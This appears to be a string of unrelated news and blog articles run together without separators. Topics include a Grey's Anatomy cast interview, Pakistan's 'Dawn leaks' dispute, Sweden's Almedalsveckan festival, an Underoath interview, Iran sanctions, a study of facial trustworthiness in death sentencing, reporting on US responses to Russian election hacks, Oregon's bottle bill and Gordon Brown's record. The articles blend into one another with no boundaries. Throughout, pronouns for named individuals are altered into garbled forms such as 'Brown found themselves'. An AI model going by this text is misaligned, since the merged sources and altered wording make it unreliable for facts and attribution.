We just shot a scene with a whole bunch of us and we all love each other and that remains. We're all really excited about our storylines. The scripts that have been coming are so solid. And the relationships that are being forged are so interesting. How Derek's character cannot be there obviously will be profoundly felt. They were in Washington for a while so we got a bit used to that feeling. Now there's this buzz of excitement about what's coming because everyone is really invested and everyone is really passionate on the set. When [you] lose somebody that you care about, that has been a big part of your life, you get a real dose of how important relationships are. Everybody right now is really appreciating and cherishing their relationships with one another and it feels really loving and filled with gratitude on set.
Have there been any conversations about season 12 being the last for Grey's?
No, certainly not.
How do you think everyone will respond to Derek's death? Sounds off in the comments below. Grey's Anatomy still has three episodes remaining in season 11 and returns next Thursday at 8 p.m. on ABC.
Email: Lesley.Goldberg@THR.com
Twitter: @Snoodit
Pakistan Army on Wednesday "withdrew" a tweet sent out by Inter-Services Public Relations (ISPR) Director General on April 29 which said the Prime Minister Office's directives on the Dawn story inquiry report were "rejected".
"The tweet on April 29, 2017 was not aimed at any government office or person," an ISPR press release said Wednesday.
"Recommendations, as contained in Para 18 of the Inquiry Committee Report, duly approved by the prime minister, have been implemented, which has settled the Dawn leaks issue," it added.
"Accordingly, ISPR's said Twitter post stands withdrawn and has become infructuous.
"Pakistan Army reiterates its firm commitment and continued resolve to uphold the Constitution of the Islamic Republic of Pakistan and support the democratic process."
Following the ISPR statement on Wednesday, a document purportedly issued by the Ministry of Interior said that: "Since action on orders of the Prime Minister has already been completed by the respective Ministries and Divisions, the issue of Dawn Leads [sic] stands settled."
Interior Ministry document─DawnNews.
Detailing the government's final position following the entire affair, the interior ministry repeated the "need to develop a code of conduct for print media, especially when dealing with issues relating to the security of Pakistan".
Continuing in line with the PM Office's earlier directives on the matter, the interior ministry reiterated that Dawn should be referred to the Pakistan Newspapers Society (APNS) for "disciplinary action" against the Editor Dawn and journalist Cyril Almeida.
It also repeated that Rao Tehsin Ali, the principal information officer, had not displayed "the required level of professionalism" and "shown carelessness while dealing with the issue" and should be proceeded against under the Efficiency and Discipline Rules 1973.
The document also reiterated that "Due to reasons referred in previous sections, the Committee recommends removal of Mr Tariq Fatemi from their current Portfolio."
The only 'new' part of the interior ministry's 'notification' was an endorsement of the removal of Senator Pervaiz Rashid by the federal government.
PM Office's directives
On April 29, the Prime Minister's Office had issued directives to remove Syed Tariq Fatemi, special assistant to the prime minister on foreign affairs, from their post for their alleged role in 'Dawn leaks', saying that a notification in this regard will be issued shortly.
The directives had come after an inquiry committee probing a story published by Dawn on October 6, 2016 submitted its findings in a report to PM Nawaz Sharif. The committee's report — the contents of which have so far not been made public — had also contained the committee's recommendations on the matter.
Action had also been ordered by the PM's Office against Rao Tehsin Ali, the principal information officer of the Ministry of Information, "under the E&D Rules 1973" on charges levelled against them in the report.
The PM's Office had also recommended referring Dawn to the Pakistan Newspapers Society (APNS) for "necessary disciplinary action", but did not say what the charges against Editor Dawn or Almeida — who wrote the story — were.
The APNS was asked to develop a code of conduct for print media, especially when it comes to stories that deal with "issues of national importance and security".
The language of the statement suggested that the recommendations were in addition to the committee's recommendations in Paragraph 18 of the inquiry report, which has yet to be made public.
However, after the Prime Minister's Office's directives were 'leaked' to media, the ISPR had tweeted saying the Army had "rejected" them, terming them "incomplete".
Maj Gen Ghafoor, who heads the military's media arm, had said: "Notification on Dawn Leak is incomplete and not in line with recommendations by the Inquiry Board. Notification is rejected."
Following the ISPR's tweet regarding the notice, Interior Minister Chaudhry Nisar Ali Khan had slammed what they said was 'unnecessary noise' surrounding the directives issued by the PM's Office earlier that day regarding an investigation into the Dawn story, saying that a formal notification has yet to be issued in this regard.
They further said a final notification would be issued by their ministry and would be in line with what they called the "black and white" recommendations made by the inquiry committee.
Imagine if this year's party conference season was cancelled and we started again. The public won't notice, but it will upset the Westminster calendar. Let's try it anyway because this whole conference thing isn't working any more. We can forget stories about councillors sleeping in their cars due to the expense of attending a city centre venue.
Instead, give every party represented in the House of Commons one day. Just 24 hours to nail the party leader's speech and announce some new policies. And lay the days on consecutively, organised by a rota. You could open up with Respect on a Sunday so George Galloway gets this political mini-season started with some of their own-brand, fiery oratory, then follow with the Conservatives on Monday, the SNP on Tuesday and so on. It can be a glorious, hectic mish-mash as parties work out how best to fill their brief moment in the spotlight.
Oh, and this will all be hosted in the same place – somewhere nice with pleasant surroundings and good food. Perhaps an island to ensure people feel far away from the Westminster hothouse. All events will be free and open to be attended by anyone who wants to come. Finally, we're going to hold it in the summer because the weather should be better and it will help politicians lighten up.
This grand plan might sound ludicrous but this is how it actually works in Sweden. Almedalsveckan 2013 begins this weekend on the island of Gotland – a quick flight from Stockholm or a three hour ferry trip. It is a political Glastonbury for the Swedish establishment. In the first week of the traditional Swedish summer holiday, they decamp to this festival en masse. “All the party leaders are here. It's impossible not to come,” says Karin Pettersson, political editor of Sweden's biggest selling daily newspaper Aftonbladet. Unsurprisingly, politicians and journalists quite like the idea of meeting up in a pretty medieval town which also serves as a glamorous stop-off on the European summer yacht tour.
The events at Almedalsveckan are free and open to anyone. There are no concrete barriers or high fences that are now synonymous with British party conferences. You don't need to pay for any passes or fill out lengthy forms to attend – while you wonder if the security services will start checking your emails and rifling through your bins. The attendance levels for Almedalsveckan increase every year. Last year 17,000 people turned up. But the reason for its huge growth in visitor numbers is not down to public accessibility, as admirable as that is.
Regular attendees don't see growing droves of average Swedes making a pilgrimage across the Baltic Sea. Members of the public who do wander around watching the seminars and debates are likely to already be on Gotland, a popular holiday destination. Adding to the politicians and journalists are the many company representatives, PR consultants and lobbyists who spot the obvious opportunity to mingle with every important politician in Sweden in one place. This includes all the regional and local politicians as well as the national parliamentarians. “It offers opportunities you would never get in Stockholm,” one lobbyist and veteran attendee of Almedalsveckan tells me. They remember first visiting in the 1990s when the attendees numbered under 1,000.
Some of the complaints about Almedalsveckan sound familiar. “What has happened in the last few years is that PR consultants and companies have kidnapped the week so they now outnumber political people by 20 to one,” says Pettersson. The parties' closely stage manage their events. Pettersson has to look back to 2005, when senior Social Democrats fell out over a welfare issue, to remember a serious story breaking unexpectedly while the week took place. Otherwise, Almedalsveckan has a clear, well-established news cycle – the party leaders will finish their speeches in time for evening bulletins and deadlines. Despite occassional attempted sabotage from rivals, each day belongs to an individual party.
Also, the accompanying evening dinners and drinks receptions are becoming ever more exclusive. Gotland's capital, Visby, has some lovely restaurants which are happy to accept those lobbying and media expenses. The schmoozing is taken just as seriously in Sweden as in Britain.
So Almedalsveckan is not without its faults. The festival works because, for a country that “doesn't do charismatic politicians” as one Swedish commentator describes it, the format seems ideal. The structure of Almedalsveckan ensures that the political parties with MPs in the Rikstag – Sweden's Parliament – each enjoy their media focus. The daily changeover between parties creates a fast-moving event that doesn't outstay its welcome. It is their political party of the year. An eight day blast and it is all over until next year. The comparison with the lumbering, drawn-out, fenced-off world of our party conferences is stark.
Instagram has made retro-filters all the rage, but maybe you like to look at regular pictures, with their original colors intact. Tough luck? Maybe not anymore. The Normalize app for iOS can go ahead and strip those things right off if you're not a fan.
Now it's not like Instagram filters are just sitting there on top of the original image. When you apply the filter, you change the original which means that Normalize is still messing with the pictures—just like Instagram does—albeit different purpose. This also means you can also use Normalize on photos that just need some balancing. That is unless you prefer to keep unintenional imperfections.
Advertisement
The biggest thing Normalize has going for it is simplicity. Normalize can do its job without making you mess with a whole bunch of settings. That said, if a photo is so filtered that it's actually lost visual quality you're pretty boned from the get-go. For the most part though, it seems pretty promising. If you want to know about how Normalize's anti-Instagram algorithms work, you can read about it on creator Joe Macirowski's blog. If you want to try it out yourself, it's $0.99 on the App Store. [Cult of Mac]
Throughout the Phoenix Mountains outlying Chaozhou city in north eastern Guangdong province, grow the historic tea plants used to create "dancong" oolong teas. With a rich tradition that goes back over 900 years, these teas have truly magnificent aromas and unique flavors that come from volcanic soil. The tea plants from the high elevation can be hundreds of years old, and have highly sought after qualities. For over 10 years we have been sourcing superb dancong oolong teas from family farmers that have been tending these tea trees for generations. This region has many different types of oolong that range from lightly oxidized to heavily oxidized and also have degrees of roasting. We offer a truly special lineup of teas from this coveted area, and encourage you to try them all!
When Underoath began their reunion tour earlier this year, they weren't entirely sure how things would play out. It had been over three years since they last took to the stage together, and seven since they did so with original drummer/vocalist Aaron Gillespie.
To put things mildly, the tour was a complete success. So much so that Underoath have already announced three festival appearances taking place later this year. We caught up with frontman Spencer Chamberlain roughly a month after the tour ended to look back on what they had accomplished, as well as what the future holds.
It's been roughly a month since Underoath's reunion tour ended—a band you never thought you'd get to play in again. How does it feel looking back?
Honestly, it's the best thing that's ever happened. I've spent more time with those dudes than anyone else in my entire life; I grew up with them on the road. We had a huge falling out; we burnt it down on both ends to the point where we said, “Fuck you, fuck you, I never want to talk to you again,” and walked away from everything thinking it would never happen again. But if you know anything about family, that's never gonna be the case. You're going to have a falling-out with your mom, or your dad or your brother at some point in your life, [but] it'll come back around and heal. Time finds its way into your heart for accepting forgiveness and forgiving others. I think [the breakup] was something that had to happen. And looking back on it now, that's a strange thing to say because in the [farewell] documentary [Tired Violence], I was kinda the last man standing and was really upset. Everyone else was done with it; I was like, “No, I wanna keep going. Why are we walking away?” But now that we did, and no matter how hurt I was, I think after time passed we healed our relationships.
I wouldn't change it for the world, because now we're closer than we've ever been. We love each other again like we did when we were kids. All the bullshit is gone, and we learned how to except each other as the men we are today. I don't think that could've happened without a huge breakup. Everything happens for a reason, and now that I can be onstage with those dudes and play songs that I've poured my heart and soul into, I actually want to be there again. I look off the stage when [we're] playing and I see these people so excited that we're back; then I look across the stage and see [that] my five best friends have the same feeling as the people in the crowd and myself—there's no price tag on that. Now that all the people who are on that stage want to be there again, it makes the band even better than it was in the first place. It's kinda wild that we're stronger and better than we used to be. We're happy, we love each other and we respect each other. Now, with [that] headspace, it's not one of those things where it's just gonna fade out again. We've looked at running this band a different way, and that's just doing things when they make sense—when we feel like they make sense. As opposed to, “Every two years we gotta release a record; we have to tour 10 months out of the year,” cause that's what you're supposed to do.
Now, being home for a month, it's really exciting. We have three festivals this summer, and we're talking about some stuff overseas. It's just about doing it smart this time around.
So, what does Sleepwave look like for the rest of the year? Around December, it was said that there will be a new album at some point.
Yes, there definitely [will be]. When I made that first Sleepwave record, I didn't really know where I was yet. I knew I wanted to make a point with [the] music, but I don't think I knew how to do what I wanted to do and still keep a foot in the door [with the heavy music scene].
Because whether I like it or not, people look at me as the guy from Underoath.
So, when Sleepwave's [first album] was about to come out, it was like, “Oh, the guy who used to be in that band Underoath is putting out a record.” People wanted to hear what they've fallen in love with about me, which is normally heavier songs, and I don't want to do that with Sleepwave. I still kinda had to keep my foot in that door, because I didn't know how to make a full leap without feeling like I was gonna bum a bunch of people out.
I was halfway through writing this next Sleepwave record when we started rehearsing for Underoath. Then I was like, “Okay, if Underoath is back, people aren't going to be offended if I just do what I want with this other band.” So there's no more, “The guy from Underoath isn't doing [heavy] music anymore, he's doing this.”
I think what's exciting for Sleepwave's second record, which I'm working on all summer long, is that I get to do exactly what I want to do, because Underoath is a band.
No one can give me shit if I make a really chill rock record that's not some in-your-face thing, because I still have another band like that.
There's that part of me that's a huge fan of Radiohead, Coldplay, Sigur Ros—all that kind of stuff. And then the Strokes, Foo Fighters, Nirvana—all the stuff that I've written in the past that has a little bit more of that side of rock that I've never felt okay releasing because it is so different from the way I write with Underoath. Now, I feel like those restrictions have been lifted. I can do all my heavy stuff with one band and I can experiment and go crazy with the other.
That's really been exciting for me to finally feel free, because when Underoath had broken up—even though Sleepwave was a different band—I didn't feel free.
I felt there were parts that I needed to keep in.
Part of you felt obligated to make something heavy.
Yeah, and that Sleepwave record isn't very heavy, and the way it was mixed and all that stuff, I wasn't very happy with [it]—you know how first records go—but I was still holding on to something. And now I feel like I can just have fun with it. I think it's going in a lighter, artsy-rock direction and Underoath will continue to be heavy.
I really wanted to get [Sleepwave's new] record out this year, but I was talking with management and friends of management, and we were like, “You know what? Fuck a timeline.” I'm gonna write until I'm really happy with this record and it'll come out when it comes out. It'll be either late 2016 or early 2017, I'm sure, but I'm just over [timelines]. And I'm not being lazy—I'm writing more songs for this Sleepwave record than I ever have, and I'm diving deeper because I feel so free. I wanna meet the right producer; I'm gonna release it under a different label—I wanna do it right this time.
[Regarding] some of the songs I wrote before the [Underoath' tour: I don't know if they'll make it on the record because I have such a different headspace now. That Underoath tour was more than just, "Oh, yay, I'm with my friends again.” My mind is just really clear; I can just be in the music now.
Underoath getting back together ultimately helped Sleepwave.
Absolutely. I'm really excited to do more Underoath tours and make more Underoath music, as well, just like I will with Sleepwave. I've always been very clear: Underoath will always gonna be what got me where I am, so I'm never gonna neglect that. I'm always gonna be here for that and any time there's a tour that makes sense—we're gonna do it. But in the spare time, I'm going to work on Sleepwave stuff and just have fun playing music.
You mentioned you're going to put out the next Sleepwave record under a new label, not Epitaph?
Yeah, I just did a one-off with Epitaph. Y'know, we just didn't see things on the same page. It was just kinda like a trial thing for me. There was a lot of miscommunication—I think they're a great label and they're great people—but it just is what it is. I don't know if there is the "right” label out there for anyone, but if you have an opportunity to try something else out, you might as well try it. alt.
Iran sent new signals on Tuesday that it was seeking to subvert the Western sanctions on its contentious nuclear energy program, adding uncertainties in advance of another round of negotiations next week in New York before the United Nations General Assembly.
The Iranians said they had been engaged in talks with Russia, a member of the group of big powers negotiating with Tehran, about economic cooperation in energy, which could undercut the sanctions. South Africa, a former Iranian oil customer that has honored the sanctions in deference to Western pressure, said that, after talks with an Iranian delegation, it hoped to resume imports in three months.
On Monday, Iran's negotiator at the nuclear talks, Abbas Araghchi, the deputy foreign minister, said their country would not countenance any new economic penalties imposed by the United States, after an announcement by the Obama administration last month that it was adding more than 25 Iranian individuals and companies to a sanctions blacklist.
The atmosphere contrasts starkly with President Hassan Rouhani's first visit to the United Nations last September for the General Assembly's annual convergence of world leaders. The Iranian president spoke optimistically of a new era and prospects for a nuclear deal — capped by a groundbreaking telephone conversation with President Obama.
New research finds a convict is more likely to be sentenced to death if they have an untrustworthy face.
Death chamber and electric chair at Sing Sing Prison in 1923. (Photo: Everett Historical/Shutterstock)
If you support the death penalty, in spite of the many compelling arguments to the contrary, you must concede it is only morally acceptable if carried out in a fundamentally fair way. Surely the decision to impose this most final of punishments must not be subject to the biases or whims of jurors or jurists.
ADVERTISEMENT Thanks for watching! Visit Website
Well, newly published research suggests who lives and who dies is determined, to a significant degree, by gut-level instinct. It finds the decision to impose a death sentence is based in part on a completely irrational construct: Whether the convict has what is perceived as a trustworthy face.
This finding "suggests an alarming bias in the criminal justice system," conclude the study's co-authors, University of Toronto psychologists John Paul Wilson and Nicholas Rule. "Put simply, one's face may determine one's fate, at least in the judicial domain."
"Perceptions of trustworthiness from faces, which have high consensus but questionable validity with regard to actual behavior, affect criminal sentencing."
It has long been known that, consciously or not, people tend to size up strangers based on their facial characteristics. A 1996 study found we use such visual metaphors as "wide-eyed innocence" and "crooked character" to quickly determine whether someone is worthy of our trust.
ADVERTISEMENT Thanks for watching! Visit Website
ADVERTISEMENT Thanks for watching! Visit Website
But would this sort of mental shortcut come into play when making the weighty decision of sentencing a convicted murderer to either death or life in prison? To find out, Wilson and Rule collected photographs of 371 men on Florida's death row (nearly the entire population), and an equal number of inmates convicted of first-degree murder but sentenced to life imprisonment.
The 742 images were broken up into sets of around 100 each. Individual faces were then rated for trustworthiness (along with other factors including Afrocentricity and attractiveness) by 208 Americans recruited online via Amazon's Mechanical Turk.
"We found that people who look less trustworthy were more often sentenced to death for first-degree murder," the researchers report in the journal Psychological Science. "Perceptions of trustworthiness from faces, which have high consensus but questionable validity with regard to actual behavior, affect criminal sentencing."
It's conceivable, of course, that our instinctive judgment of trustworthiness is sometimes accurate. So to take that issue out of the equation, Wilson and Rule collected a second set of facial images—this one from the Innocence Project. It featured 37 men who were wrongly convicted of, and served time in prison, for a serious crime before being exonerated. Twenty had been sentenced to life in prison; 17 received the death penalty.
Their faces were judged for trustworthiness by an online panel of 39 Americans. Once again, "faces perceived as less trustworthy were more likely to be sentenced to death," the researchers report. "Thus facial appearance affects real-world criminal sentencing independently of actual guilt."
Altogether, the results paint "a somewhat alarming picture of how systems of legal punishment are vulnerable" to irrational decision-making, the researchers conclude. "People who look less trustworthy receive harsher criminal sentences," they write, "and overgeneralization of traits from their faces appears to be responsible for this effect."
Can a system with such egregious built-in bias truly be justified?
Findings is a daily column by Pacific Standard staff writer Tom Jacobs, who scours the psychological-research journals to discover new insights into human behavior, ranging from the origins of our political beliefs to the cultivation of creativity.
The Pirate Party of Germany has tabled some amendments to make some important changes to the statutes of Pirate Parties International (PPI).
The full wording of the amendments can be seen in the conference section of the PPI wiki.
There are five changes being proposed:
Admittance of Members
This amendment will mean that a member of PPI no longer need to have “Pirate” in the name. This has caused legal problems for parties like PPRU and PPTW and it allows existing parties that wish to join with full membership privileges to do so without having to change their name. Supportive Membership
This amendment will allow for individuals and organisations to become members of PPI for a membership fee of EURO 10.00 per year. This will give people a sense of identity with the international organisation and allow them to contribute financially directly as well a through their party if it is a member. Termination of Membership
Up to now parties wishing to leave PPI were required to send a registered letter. This was seen as rather absurd in the age of electronic communication and some of the parties that left in recent months declined to do so. It also makes provisions so that parties that terminate membership can have no legal claims on PPI. One Chair, one vice-Chair
Previously there have been two co-chairs – generally a woman and a man. This has not worked well and in fact the last two women co-chairs left before their terms were completed. PPDE puts the reasons down to conflict of responsibilities. Term of Office
With the complete board being elected anew every year there is the fear that organisational memory can be lost, especially if a complete new board was elected. The proposal is to elect board members for a two-year period to facilitate a rotation system, where half of the board is elected one year and the other half the following year. This is the system that is currently used in PPSE.
If you are not an international coordinator, you might wonder why this should be of interest to you.The international Pirate Movement is important, as many of the issues we fight on a national level are being implemented internationally.
If you want your party to vote for,against or for a change to any of the changes being proposed above, or if you would like to change or add to the other PPI statutes, contact your international coordination officer.
Let your voice be heard in the PPI GA in Lodz, Poland on 04-5 July 2015.
Featured image: CC BY-SA Pirate Times from work by PPI and Pixabay.com
SAN FRANCISCO — The US has no “playbook” for how to respond to Russia, following the Obama administration's public blaming of Russia for a series of hacks intended to interfere with the US election process, a Pentagon official said.
“We are writing the playbook as we go along,” said the official, who spoke to BuzzFeed on condition of anonymity, because they aren't authorized to speak to the press. “There are a number of options open to us at this juncture, now that official attribution has been confirmed.”
Attribution — officially naming a person or a country behind a cyberattack — is increasingly difficult to determine. In order to name Russia, the US would have been “extremely confident that the evidence in hand pointed to no other actor,” said the DOD official.
The statement by the Department of Homeland Security (DHS) and US Intellifence Community (USIC) blamed Russia for a series of hacks on Democratic Party officials, stating, “the recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts.” Those hacks include more than 20,000 emails from the Democratic National Committee's (DNC) servers, which have been published on Wikileaks and on the DCLeaks websites. A hacker going by the name of Guccifer 2.0 has also released emails allegedly from the servers of the Clinton Foundation, and DNC. Guccifer 2.0, who has answered questions from BuzzFeed News relayed over direct messages, has previously claimed to be Romanian. They did not respond to a request for comment Friday on the accusation that they were Russian.
The joint statement from the Department of Homeland Security and intelligence community comes less than two weeks after the White House tried to keep two of Congress's top intelligence officials from naming the Kremlin as the originator of the string cyberattacks. Sen. Dianne Feinstein and Rep. Adam Schiff, vice-chairs of the Senate and House Intelligence Committees, respectively, were the first government officials to publicly accuse Russia of the hacks in a joint-statement last month.
That statement, one US official said, appeared to have backed the White House into a corner. "Once they briefed Congress, it was only a matter of time [until they would have to publicly accuse Russia]," the official said.
Actions that the US could take range from placing new sanctions on Russia, to issuing criminal indictments for individuals involved, to taking diplomatic action, such as expelling Russian diplomats from the United States. And while cybersecurity experts agree that the US is likely already engaged in counter cyber-espionage against Putin's government, more offensive actions against Russia could be the next step.
“We've got cyber command, and I think we need to use them, not to attack Russia but to counter attack,” said Jason Healey, former White House Director of Cyber Infrastructure, and a Senior Research Scholar at Columbia University's School of International and Public Affairs. “We need to do a counteroffensive to disrupt the Russians who are attacking us. To attack their command and control servers, and to throw some sand in the gear.”
Healey said that the public leaking of the emails had “crossed the line.”
“They are disrupting systems. This isn't espionnage anymore. They are now actively trying to disrupt the elections. If they are going to be confrontational we should be trying to thwart this,”
One precedent the government currently can look to is the naming of North Korea as the source of the December 2014 hack against Sony. In the wake of that attack, the Obama administration announced sanctions against 10 North Korean officials, and later issued an executive order as a general framework for sanctions as a response to hacks. (Prior to Chinese President Xi Jiping's visit to the US in September 2015, the US publicly discussed sanctions, and issued indictments against five Chinese individuals whom the Department of Justice accused of attacking US targets.)
Russia, however, has a much more expansive and advanced internet infrastructure than North Korea, and is unlikely to have left behind proof identifying particular individuals involved in the hacks on Democratic targets. Healey said that it was clear from Russia's ongoing military actions in Ukraine and Crimea that “Putin doesn't care about sanctions.”
Another DOD official, who works within US Cyber Command, told BuzzFeed News in an interview last week that the US was already engaged in a “cold war-esque cyberwar with Russia,” and that any offensive steps taken were “dangerous and likely to escalate quickly.”
“There are calculations being made on both sides. The cyber-espionage was not new. What was new was making those emails public, and trying to influence an ongoing election in the United States in such a blatant fashion. If it is definitively announced that the Russian government were behind this, it would be a serious escalation from their side,” said the second official, who spoke on condition of anonymity because they were not authorized to speak to the press.
They would not answer whether the US might engage in its own dissemination of damaging information against the Russian government, or what sort of offensive actions the US cyber command would consider taking, but did say they US had, “one of the best offensive cyber capabilities in the world.”
Whatever action the Obama administration takes is likely to be reconsidered by whomever wins the US presidential elections. Hillary Clinton, the Democratic Party presidential nominee, has said that if they become president the US could respond to cyberattacks with military action.
"As President, I will make it clear that the United States will treat cyberattacks just like any other attack. We will be ready with serious political, economic, and military responses," they said at an Aug. 31 campaign event in Cincinnati. "I want us to lead the world in setting the rules in cyberspace. If America doesn't, others will."
Republican presidential nominee Donald Trump, who has previously said that it was unclear if Russia was behind the DNC hacks, has said that the US should get, “very tough on cyber,” though they haven't articulated what that would mean.
“We should be better than anybody else, and perhaps we're not. I don't think anybody knows that it was Russia that broke into the DNC. She's saying Russia, Russia, Russia—I don't, maybe it was. I mean, it could be Russia, but it could also be China. It could also be lots of other people. It also could be somebody sitting on their bed that weighs 400 pounds, okay?,” Trump said, during the first presidential debate last Monday.
Oregon Bottle Bill to increase to 10 cents starting Saturday
For decades, recyclers have received 5 cents for returning empty cans and bottles. Starting Saturday, that increases to a dime.
Have some old soft drink cans lying around waiting to get recycled? Starting Saturday, those cans will be worth a little bit more.
The state is increasing the redemption value of eligible beverage containers covered by the Oregon Bottle Bill starting April 1. Bottles returned after that date will be worth 10 cents, up from the decades-old redemption rate of 5 cents.
According to the Oregon Liquor Control Commission, which regulates the bottle bill, the increase is aimed at getting more people to return empty cans and bottles. Oregonians once flocked to return cans and bottles at grocery stores, but the state has seen a steady decline in returns over the last several years.
According to the OLCC, only about 64.5 percent of consumers returned their empty bottles and cans to the state in 2015, lower than the 68.26 percent rate documented in 2014.
Under state law, if the return rate for beverage containers falls below 80 percent for two years in a row, the redemption value of those containers must increase to 10 cents per container.
The Oregon Liquor Control Commission announced the change back in July. The state has seen fewer and fewer people returning the bottles and cans over the last several years, though it still doubles the national average.
Eligible containers include water bottles, carbonated soft drinks beer and malt beverages. Starting Jan. 1, 2018, the bill will include tea, coffee, hard cider, fruit juice, kombucha and coconut water containers.
Oregon was the first state in the country to pass a bottle bill in 1971. The bill requires customers to pay 5-cent deposits on soda cans and bottles, which they can reclaim when they recycle the cans with the state, instead of throwing them away.
Only 10 states and Guam have bottle bills. Oregon will become the second state with a 10-cent deposit for all bottles and cans, joining Michigan. Most other states have a 5-cent deposit, through Maine and Vermont have 15-cent deposits for liquor bottles.
Mike Leach is a popular football coach. Their offense is a blast to watch, they say hilarious things, they know trivia about everything, their players graduate, he's stuck it to The Man, and they counseled Coach Taylor in Friday Night Lights. If only there were some way they could become even more popular. Maybe this could do the trick:
"The minimum should be 16 teams,'' they said. "I think 32 is better than 16, but I think 64 would be ideal," they started to explain to me, without taking a breath. "You could cut the regular season down to 10 games, but guarantee everybody 12 games. In the end, the champion would play 16 games." Don't bring up school workload to them as an argument. "That's a bunch of foolishness," they chided, in a nice, polite tone.
Dare I say Leach is even more forward-thinking here than even our wildest dreams, which is saying something, since our dreams are pretty wild? I do believe so. This 64-team college football bracket from last week includes a concession about settling for an insane-enough-as-it-is 32-team tournament due to the regular season's length, but the Dread Pirate breezes past all that.
I think he's said this kind of thing before, but he's saying it as a college football coach this time around. A coach whose Washington State team would probably benefit from a bigger tournament, of course.
Leading us forever into the future, no matter how much nuttier it is than we could have imagined: Mike Leach.
Follow @SBNationCFB
For more on Wazzu football, visit Washington State blog Coug Center, plus Pac-12 blog Pacific Takes and SB Nation Seattle.
In the week Gordon Brown announced they will stand down from their Westminster constituency at the May 2015 general election, two central observations come to mind. From the Brown government to its Cameron-Clegg coalition successor, there has been more continuity than change. And the failings of the Brown government were very much those of all UK governments since 1970.
Since the Heath government's 1971 Competition and Credit Control Act started liberalising the credit supply to the UK economy, every subsequent prime minister and chancellor, including Gordon Brown in both roles, has resorted to a British growth model based upon consumption, property and accumulating private household debt. For example, during Brown's tenure as chancellor, over £800bn was added to UK household private debt.
Trade continuity
Every government has delivered annual deficits on the UK's current account since 1984, and on the trade account since 1982. In the final full year of the Brown government in 2009, the UK's current account deficit was £41.4bn or 2.8% of GDP (compared to £72.4bn or 4.2% of GDP in 2013), and the UK's trade deficit £28.1bn (compared to £32.1bn in 2013). The Cameron-Clegg coalition has simply delivered bigger deficits.
No UK government since 1970 has succeeded in re-balancing the economy towards an alternative growth model based upon exports, private business investment and manufacturing. In 2009 the Brown government presided over an annual deficit on the UK's trade in goods of £83.6bn, compared to an annual deficit of £110.2bn in 2013. George Osborne's failure to re-balance the economy has simply been greater than Brown's, both as chancellor and prime minister.
City slackening
The signature event of the Brown government, the financial crisis of 2007-2008, was a direct consequence of the light-touch, risk-based approach to financial regulation adopted by Gordon Brown and Ed Balls during their decade at the treasury.
They followed this approach despite the fact that in December 1998, Brown had identified the need for wholesale reform of financial markets and to rediscover public purpose in the global economy. They had also chaired one of the key committees at the International Monetary Fund for nearly eight years, but never used this position to challenge the neo-liberal orthodoxy during their tenure as chancellor or prime minister.
They may have been in office, but Brown did not use the political power at their disposal when given the opportunity. In this regard they were simply occupying the common ground first laid down by Margaret Thatcher and Sir Keith Joseph in the mid-1970s. In its austerity agenda, the Cameron-Clegg government has also occupied this common ground.
Brown's subsequent account of the crisis, Beyond the Crash: Beyond The First Crisis of Globalisation, documents their personal realisation that had they been bolder and trusted their own intellectual judgement and political instincts to push for a much more radical response to the crisis, they could have gone down in political history not only as one of the greatest peacetime prime ministers but as a statesman of major global significance and reputation.
Instead, Brown and their chancellor, Alistair Darling, superintended a bailout for failing banks, whose total value reached £1.162tn at its peak. By the end of March 2014 that figure had fallen dramatically, but still amounted to £123bn. The Brown government also presided over the Bank of England giving £375bn of cheap credit to the banks through the policy of quantitative easing.
No other sector of the UK economy had ever received such levels of support in peacetime. However, the Brown government's strategic decision to privilege banking over all other sectors of the UK economy, and to subordinate its wider British modernisation agenda to the defence of the interests of the City of London, was simply in accordance with the priorities of every UK government since 1945.
Foreign fidelity
In its foreign policy choices, the Brown government displayed the same unshakeable Atlanticism, pronounced Eurosceptism, and commitment to increasing international aid to 0.7% of gross national income, as its coalition successor.
It also had to deal with the toxic legacy of the Blair government's ill-advised interventions in Iraq and Afghanistan. Where Brown announced in December 2008 the end of UK combat operations in Iraq by the May 31 2009, in July 2011 Cameron announced the reduction of UK troops in Afghanistan, and subsequently the end of combat operations by November 28 2014.
Tony Blair as prime minister aspired and failed to put the UK at the heart of Europe, not least because of Brown's implacable opposition to UK participation in European political and monetary integration. Once prime minister himself, Brown found themselves isolated in Europe, as symbolised by their absence from the official signing of the Lisbon Treaty. David Cameron has subsequently found themselves equally isolated at European summits.
Domestiv policy
In domestic policy terms, the impact of devolution meant that the Brown government's capacity to reform public services was confined to England, where Brown had no personal democratic mandate to intervene.
In both health and education, Brown continued the Blair governments' pattern of top-down reorganisation of hospitals and schools, and the increasing use of private sector finance and organisations to deliver services. This pattern of provision has continued under the Cameron-Clegg government through Andrew Lansley's top-down further reorganisation of the NHS in England, and Michael Gove's expansion of New Labour's academy schools programme.
Judgement day
The electorate's verdict on the Brown government was clear but harsh. The Labour Party won only 29% of the vote, its worst performance at a general election since 1983, when both Brown and Blair had first been elected at Westminster. But what is often forgotten (at least south of the border) is that Scotland and England delivered a very different verdict. In England Labour won only 191 seats and 28.1% of the vote, losing 87 seats and 7.4% of the vote, whereas in Scotland it actually increased its share of the vote by 3.1% to 42.0% and won an extra seat to take its total to 42.
This says a great deal both about Gordon Brown the politician, and the priorities, performance and legacy of their government. A product of the highly distinctive internal political culture of the Labour Party in Scotland, as Brown's impassioned eve-of-referendum speech in Glasgow attested, they were almost most comfortable and effective speaking to a Scots audience and when affirming their commitment to Scotland's national interests, the importance of Britishness, and Scotland's place within the British union.
It was always built on a view of the UK in terms of nations and regions, where Scotland, Wales and Northern Ireland would be the nations, and England would be divided into regions. For a thousand years of its history, political and cultural identity in England has been to nation, county and locality. It has never been built on regions.
Like the title of their recent book, My Scotland, Our Britain, and their post-referendum agenda for further devolution to Scotland and broader constitutional reform, Brown's vision has offered no place for or political recognition for England as a nation. For the future of the union, it is a fatal flaw. Gordon Brown has never understood or accepted that the people of England will never accept a constitutional settlement which divides England against itself.
Brown will be remembered as the most successful peacetime Labour chancellor who also kept the UK out of the fatally flawed single European currency. As prime minister, they will be remembered for having rescued several major UK banks, but at vast cost to UK taxpayers.  They are also likely to be assured a place in British political history as the last prime minister of the UK to have represented a Scottish constituency.
In question #86 of their Reasonable Faith column, William Lane Craig addresses a question from a Christian who's troubled by one of the most wicked doctrines of that theology, the dogma of Hell. Craig's correspondent wonders whether the saved will feel compassion for the damned, but also worries that it would be a violation of free will for God to erase their memories of their lost loved ones.
